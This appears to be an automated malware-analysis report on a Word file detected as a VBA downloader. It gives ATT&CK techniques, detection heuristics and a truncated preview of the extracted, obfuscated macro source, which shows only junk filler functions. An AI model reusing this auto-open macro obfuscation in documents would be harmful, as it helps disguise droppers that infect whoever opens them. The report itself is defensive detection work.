MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains a VBA macro with an AutoOpen function, indicating it is designed to execute automatically when the document is opened. Heuristics indicate the use of CreateObject, a common technique for launching malicious payloads. ClamAV detection as 'Doc.Macro.VBSDownloader-6336817-0' strongly suggests the macro's purpose is to download and execute a secondary stage. The VBA code itself is heavily obfuscated and appears to be a downloader stub.
Heuristics 7
-
ClamAV: Doc.Macro.VBSDownloader-6336817-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10966 bytes |
SHA-256: 86d8de6fee6be16e7e3a1e582304906d184749b82eed08e5b071dd31400f740a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Function EEsGPrGzGA() Dim DDgYyyGgwf() BYFvAYLZLDs = 6174 ReDim DDgYyyGgwf(6174) DDgYyyGgwf(3303) = GWHtzCVyW DDgYyyGgwf(1152) = kmMwVpBBT DDgYyyGgwf(6006) = BTvubsUSG DDgYyyGgwf(5383) = 2945 DDgYyyGgwf(782) = 2554 DDgYyyGgwf(2616) = 4584 For BYFvAYLZLDs = 579 To 731 DDgYyyGgwf(BYFvAYLZLDs) = BYFvAYLZLDs Next End Function Function yEUgfsym() Dim vcAnWCGCBmg() fuLuSrVUUa = 8472 ReDim vcAnWCGCBmg(8472) vcAnWCGCBmg(3740) = nHywntcn vcAnWCGCBmg(4379) = SGweBgSy vcAnWCGCBmg(6777) = eHfFRwHy vcAnWCGCBmg(1412) = EZMaUvCk vcAnWCGCBmg(3043) = KAuNUcmNY vcAnWCGCBmg(185) = 7751 vcAnWCGCBmg(5431) = 8624 For fuLuSrVUUa = 7807 To 7482 vcAnWCGCBmg(fuLuSrVUUa) = fuLuSrVUUa Next End Function Function CkDeaxfuxhb() Dim hnuVfKywKm() tuueNuzDKYE = 1921 ReDim hnuVfKywKm(1921) hnuVfKywKm(188) = fHzDSwDhf hnuVfKywKm(1690) = bkdyVburM hnuVfKywKm(404) = 2034 hnuVfKywKm(968) = 5676 hnuVfKywKm(234) = 3584 hnuVfKywKm(1854) = 3365 hnuVfKywKm(1193) = 4399 hnuVfKywKm(1039) = 4191 For tuueNuzDKYE = 1263 To 450 hnuVfKywKm(tuueNuzDKYE) = tuueNuzDKYE Next End Function Function BgLWARLL() Dim GdBzEShWPCF() uvgHwuAYn = 3708 ReDim GdBzEShWPCF(3708) GdBzEShWPCF(2785) = KUYLvyfVZ GdBzEShWPCF(861) = MxXzaUxBw GdBzEShWPCF(3583) = HeaZPTWL GdBzEShWPCF(3305) = EUhRxVuDhz GdBzEShWPCF(1395) = LErRPFPZeCP GdBzEShWPCF(928) = MKzkvRLtu GdBzEShWPCF(3504) = 6445 GdBzEShWPCF(1938) = 5142 GdBzEShWPCF(2253) = 2246 GdBzEShWPCF(1111) = 6950 For uvgHwuAYn = 1726 To 1247 GdBzEShWPCF(uvgHwuAYn) = uvgHwuAYn Next End Function Function yYdvPYXe() Dim VeHAcCHvEd() FZTbnZNKguC = 7067 ReDim VeHAcCHvEd(7067) VeHAcCHvEd(6593) = CsekaPFCM VeHAcCHvEd(6177) = ZLPysZfKX VeHAcCHvEd(235) = 3322 VeHAcCHvEd(727) = 7278 VeHAcCHvEd(4782) = 199 VeHAcCHvEd(2783) = 841 VeHAcCHvEd(3404) = 7082 For FZTbnZNKguC = 5496 To 78 VeHAcCHvEd(FZTbnZNKguC) = FZTbnZNKguC Next End Function Function CBhuzABgN() Dim CUZEfUFeSr() baUpCttvh = 7139 ReDim CUZEfUFeSr(7139) CUZEfUFeSr(3594) = bbNSWgbGETv CUZEfUFeSr(5014) = HtxsswHba CUZEfUFeSr(3216) = sEAHZpPCh CUZEfUFeSr(1481) = MVktruwdZvx CUZEfUFeSr(4760) = SVFUMgdcp CUZEfUFeSr(5330) = UtTxfcVsFUK CUZEfUFeSr(3033) = 3757 CUZEfUFeSr(2312) = 2198 CUZEfUFeSr(2085) = 3091 CUZEfUFeSr(5636) = 2251 CUZEfUFeSr(6159) = 8791 CUZEfUFeSr(2124) = 4982 For baUpCttvh = 2172 To 5921 CUZEfUFeSr(baUpCttvh) = baUpCttvh Next End Function Function FGPPhKKx() Dim eWnYwLkK() DprwfwPA = 6904 ReDim eWnYwLkK(6904) eWnYwLkK(5942) = WkGfWkTmbgU eWnYwLkK(800) = AnARdbSG eWnYwLkK(732) = 2484 eWnYwLkK(5243) = 9155 eWnYwLkK(3221) = 2378 eWnYwLkK(1416) = 2223 eWnYwLkK(4954) = 3753 For DprwfwPA = 307 To 4425 eWnYwLkK(DprwfwPA) = DprwfwPA Next End Function Function YvtywTsWrDG() Dim dENDeMmW() eMWdSXWPa = 8375 ReDim dENDeMmW(8375) dENDeMmW(1395) = tDWSVtue dENDeMmW(2763) = KvTYPpfp dENDeMmW(2177) = aWwZRCkvc dENDeMmW(6809) = 8316 dENDeMmW(3899) = 1515 dENDeMmW(3180) = 7715 dENDeMmW(795) = 2004 dENDeMmW(149) = 3841 dENDeMmW(8003) = 3925 For eMWdSXWPa = 3546 To 1756 dENDeMmW(eMWdSXWPa) = eMWdSXWPa Next End Function Function DcuxXcRY() Dim LUXZkUhp() LvktrFZdS = 9840 ReDim LUXZkUhp(9840) LUXZkUhp(1935) = fdZsFHpyp LUXZkUhp(76) = ZSYmyXnd LUXZkUhp(166) = XcwtzWBuDfG LUXZkUhp(2494) = 4463 LUXZkUhp(9092) = 3608 LUXZkUhp(4041) = 6716 LUXZkUhp(6841) = 8087 For LvktrFZdS = 4421 To 1967 LUXZkUhp(LvktrFZdS) = LvktrFZdS Next End Function Function pWeyaNTDFKK() Dim sLvApCnesEf() YDDsLVHT = 338 ReDim sLvApCnesEf(338) sLvApCnesEf(99) = ASzpcXZB sLvApCnesEf(177) = ECpTkMPYTT sLvApCnesEf(122) = KuLhMhvn sLvApCnesEf(140) = TFSdEwnrg sLvApCnesEf(229) = ARC ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.